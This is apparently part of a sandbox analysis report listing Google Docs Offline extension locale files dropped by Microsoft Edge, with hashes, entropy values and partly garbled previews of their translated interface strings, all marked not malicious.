                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
